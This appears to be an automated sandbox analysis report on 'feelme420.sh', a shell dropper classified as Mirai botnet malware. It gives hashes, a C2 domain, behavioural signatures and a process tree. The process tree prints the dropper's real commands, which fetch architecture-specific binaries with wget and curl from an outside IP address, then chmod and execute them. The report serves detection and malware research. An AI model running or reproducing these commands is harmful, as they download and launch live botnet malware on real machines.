Analysis
-
max time kernel
128s -
max time network
152s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
19-12-2024 07:12
Static task
static1
Behavioral task
behavioral1
Sample
feelme420.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
feelme420.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
feelme420.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
feelme420.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
feelme420.sh
-
Size
3KB
-
MD5
22e9d65b991f00de3a52071664dc52f9
-
SHA1
2b6dd972572c4c72ecf43bb7b66eebe776cd0360
-
SHA256
7c31b6f7e29de978c261d41059788662d9d53faf08be61330e611eedcd46d33b
-
SHA512
eefb50d98fc847673e4c38177789e26ee89ec7f027ec5ec92a842470638a84300f378cf10120afab26fe5a87de34c6616f33fc389be816b4763f0fea0eff18cb
Malware Config
Extracted
mirai
chernobyl.stressing.world
Signatures
-
Mirai family
-
Contacts a large (12800) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 16 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1540 chmod 1612 chmod 1622 chmod 1482 chmod 1520 chmod 1562 chmod 1592 chmod 1632 chmod 1492 chmod 1510 chmod 1572 chmod 1582 chmod 1530 chmod 1550 chmod 1602 chmod 1642 chmod -
Executes dropped EXE 16 IoCs
ioc pid Process /tmp/f331m3420 1483 f331m3420 /tmp/f331m3420 1493 f331m3420 /tmp/f331m3420 1511 f331m3420 /tmp/f331m3420 1521 f331m3420 /tmp/f331m3420 1531 f331m3420 /tmp/f331m3420 1541 f331m3420 /tmp/f331m3420 1551 f331m3420 /tmp/f331m3420 1563 f331m3420 /tmp/f331m3420 1573 f331m3420 /tmp/f331m3420 1583 f331m3420 /tmp/f331m3420 1593 f331m3420 /tmp/f331m3420 1603 f331m3420 /tmp/f331m3420 1613 f331m3420 /tmp/f331m3420 1623 f331m3420 /tmp/f331m3420 1633 f331m3420 /tmp/f331m3420 1643 f331m3420 -
Modifies Watchdog functionality 1 TTPs 32 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/misc/watchdog f331m3420 File opened for modification /dev/watchdog f331m3420 -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Enumerates active TCP sockets 1 TTPs 15 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 32 IoCs
description ioc Process File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /bin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 File opened for modification /sbin/watchdog f331m3420 -
Reads process memory 1 TTPs 34 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
description ioc Process File opened for reading /proc/473/maps f331m3420 File opened for reading /proc/592/maps f331m3420 File opened for reading /proc/666/maps f331m3420 File opened for reading /proc/857/maps f331m3420 File opened for reading /proc/440/maps f331m3420 File opened for reading /proc/442/maps f331m3420 File opened for reading /proc/458/maps f331m3420 File opened for reading /proc/469/maps f331m3420 File opened for reading /proc/523/maps f331m3420 File opened for reading /proc/662/maps f331m3420 File opened for reading /proc/428/maps f331m3420 File opened for reading /proc/934/maps f331m3420 File opened for reading /proc/590/maps f331m3420 File opened for reading /proc/429/maps f331m3420 File opened for reading /proc/448/maps f331m3420 File opened for reading /proc/461/maps f331m3420 File opened for reading /proc/462/maps f331m3420 File opened for reading /proc/563/maps f331m3420 File opened for reading /proc/691/maps f331m3420 File opened for reading /proc/409/maps f331m3420 File opened for reading /proc/513/maps f331m3420 File opened for reading /proc/507/maps f331m3420 File opened for reading /proc/544/maps f331m3420 File opened for reading /proc/690/maps f331m3420 File opened for reading /proc/993/maps f331m3420 File opened for reading /proc/506/maps f331m3420 File opened for reading /proc/470/maps f331m3420 File opened for reading /proc/923/maps f331m3420 File opened for reading /proc/451/maps f331m3420 File opened for reading /proc/466/maps f331m3420 File opened for reading /proc/699/maps f331m3420 File opened for reading /proc/949/maps f331m3420 File opened for reading /proc/998/maps f331m3420 File opened for reading /proc/457/maps f331m3420 -
Changes its process name 16 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself a 1483 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1493 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1511 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1521 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1531 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1541 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1551 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1563 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1573 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1583 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1593 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1603 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1613 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1623 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1633 f331m3420 Changes the process name, possibly in an attempt to hide itself a 1643 f331m3420 -
Reads system network configuration 1 TTPs 15 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 File opened for reading /proc/net/tcp f331m3420 -
description ioc Process File opened for reading /proc/1043/maps f331m3420 File opened for reading /proc/1049/maps f331m3420 File opened for reading /proc/1052/maps f331m3420 File opened for reading /proc/1059/maps f331m3420 -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1486 wget 1490 curl -
Writes file to tmp directory 31 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/feelme420.mips wget File opened for modification /tmp/feelme420.ppc curl File opened for modification /tmp/feelme420.x86_64 curl File opened for modification /tmp/feelme420.i686 wget File opened for modification /tmp/f331m3420 feelme420.sh File opened for modification /tmp/feelme420.mips curl File opened for modification /tmp/feelme420.arm5 curl File opened for modification /tmp/feelme420.spc wget File opened for modification /tmp/feelme420.arc wget File opened for modification /tmp/feelme420.i486 wget File opened for modification /tmp/feelme420.x86 wget File opened for modification /tmp/feelme420.arm6 curl File opened for modification /tmp/feelme420.ppc wget File opened for modification /tmp/feelme420.sh4 wget File opened for modification /tmp/feelme420.sh4 curl File opened for modification /tmp/feelme420.arm7 wget File opened for modification /tmp/feelme420.arm7 curl File opened for modification /tmp/feelme420.mpsl wget File opened for modification /tmp/feelme420.arm curl File opened for modification /tmp/feelme420.i486 curl File opened for modification /tmp/feelme420.x86 curl File opened for modification /tmp/feelme420.arm5 wget File opened for modification /tmp/feelme420.m68k wget File opened for modification /tmp/feelme420.m68k curl File opened for modification /tmp/feelme420.spc curl File opened for modification /tmp/feelme420.i586 curl File opened for modification /tmp/feelme420.mpsl curl File opened for modification /tmp/feelme420.arm6 wget File opened for modification /tmp/feelme420.arc curl File opened for modification /tmp/feelme420.x86_64 wget File opened for modification /tmp/feelme420.i686 curl
Processes
-
/tmp/feelme420.sh/tmp/feelme420.sh1⤵
- Writes file to tmp directory
PID:1468 -
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.x862⤵
- Writes file to tmp directory
PID:1469
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.x862⤵
- Writes file to tmp directory
PID:1478
-
-
/bin/catcat feelme420.x862⤵PID:1481
-
-
/bin/chmodchmod +x config-err-d1U8bY f331m3420 feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT2⤵
- File and Directory Permissions Modification
PID:1482
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
PID:1483
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1486
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1490
-
-
/bin/chmodchmod +x config-err-d1U8bY f331m3420 feelme420.mips feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT2⤵
- File and Directory Permissions Modification
PID:1492
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1493
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.mpsl2⤵
- Writes file to tmp directory
PID:1504
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.mpsl2⤵
- Writes file to tmp directory
PID:1508
-
-
/bin/chmodchmod +x config-err-d1U8bY f331m3420 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT2⤵
- File and Directory Permissions Modification
PID:1510
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1511
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.arm2⤵PID:1514
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.arm2⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/chmodchmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT2⤵
- File and Directory Permissions Modification
PID:1520
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1521
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.arm52⤵
- Writes file to tmp directory
PID:1524
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.arm52⤵
- Writes file to tmp directory
PID:1528
-
-
/bin/chmodchmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT2⤵
- File and Directory Permissions Modification
PID:1530
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1531
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.arm62⤵
- Writes file to tmp directory
PID:1534
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.arm62⤵
- Writes file to tmp directory
PID:1538
-
-
/bin/chmodchmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT2⤵
- File and Directory Permissions Modification
PID:1540
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1541
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.arm72⤵
- Writes file to tmp directory
PID:1544
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.arm72⤵
- Writes file to tmp directory
PID:1548
-
-
/bin/chmodchmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-timedated.service-77f3QT2⤵
- File and Directory Permissions Modification
PID:1550
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1551
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.ppc2⤵
- Writes file to tmp directory
PID:1556
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.ppc2⤵
- Writes file to tmp directory
PID:1560
-
-
/bin/chmodchmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z2⤵
- File and Directory Permissions Modification
PID:1562
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1563
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.m68k2⤵
- Writes file to tmp directory
PID:1566
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.m68k2⤵
- Writes file to tmp directory
PID:1570
-
-
/bin/chmodchmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z2⤵
- File and Directory Permissions Modification
PID:1572
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1573
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.sh42⤵
- Writes file to tmp directory
PID:1576
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.sh42⤵
- Writes file to tmp directory
PID:1580
-
-
/bin/chmodchmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z2⤵
- File and Directory Permissions Modification
PID:1582
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1583
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.spc2⤵
- Writes file to tmp directory
PID:1586
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.spc2⤵
- Writes file to tmp directory
PID:1590
-
-
/bin/chmodchmod +x config-err-d1U8bY f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z2⤵
- File and Directory Permissions Modification
PID:1592
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1593
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.arc2⤵
- Writes file to tmp directory
PID:1596
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.arc2⤵
- Writes file to tmp directory
PID:1600
-
-
/bin/chmodchmod +x config-err-d1U8bY f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z2⤵
- File and Directory Permissions Modification
PID:1602
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1603
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.x86_642⤵
- Writes file to tmp directory
PID:1606
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.x86_642⤵
- Writes file to tmp directory
PID:1610
-
-
/bin/chmodchmod +x config-err-d1U8bY f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z2⤵
- File and Directory Permissions Modification
PID:1612
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1613
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.i6862⤵
- Writes file to tmp directory
PID:1616
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.i6862⤵
- Writes file to tmp directory
PID:1620
-
-
/bin/chmodchmod +x config-err-d1U8bY f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z2⤵
- File and Directory Permissions Modification
PID:1622
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1623
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.i4862⤵
- Writes file to tmp directory
PID:1626
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.i4862⤵
- Writes file to tmp directory
PID:1630
-
-
/bin/chmodchmod +x config-err-d1U8bY f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z2⤵
- File and Directory Permissions Modification
PID:1632
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
PID:1633
-
-
/usr/bin/wgetwget http://94.23.167.188/F331M3/feelme420.i5862⤵PID:1636
-
-
/usr/bin/curlcurl -O http://94.23.167.188/F331M3/feelme420.i5862⤵
- Writes file to tmp directory
PID:1640
-
-
/bin/chmodchmod +x config-err-d1U8bY f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i586 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64 netplan_q4owmhud snap-private-tmp ssh-7YtxyD3VLmUW systemd-private-5ec902bda5ef4de78002cd739cd7d80b-bolt.service-9uwbcQ systemd-private-5ec902bda5ef4de78002cd739cd7d80b-colord.service-zDaCdX systemd-private-5ec902bda5ef4de78002cd739cd7d80b-ModemManager.service-5IRDgC systemd-private-5ec902bda5ef4de78002cd739cd7d80b-systemd-resolved.service-j1HE9Z2⤵
- File and Directory Permissions Modification
PID:1642
-
-
/tmp/f331m3420./f331m3420 feelme420.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
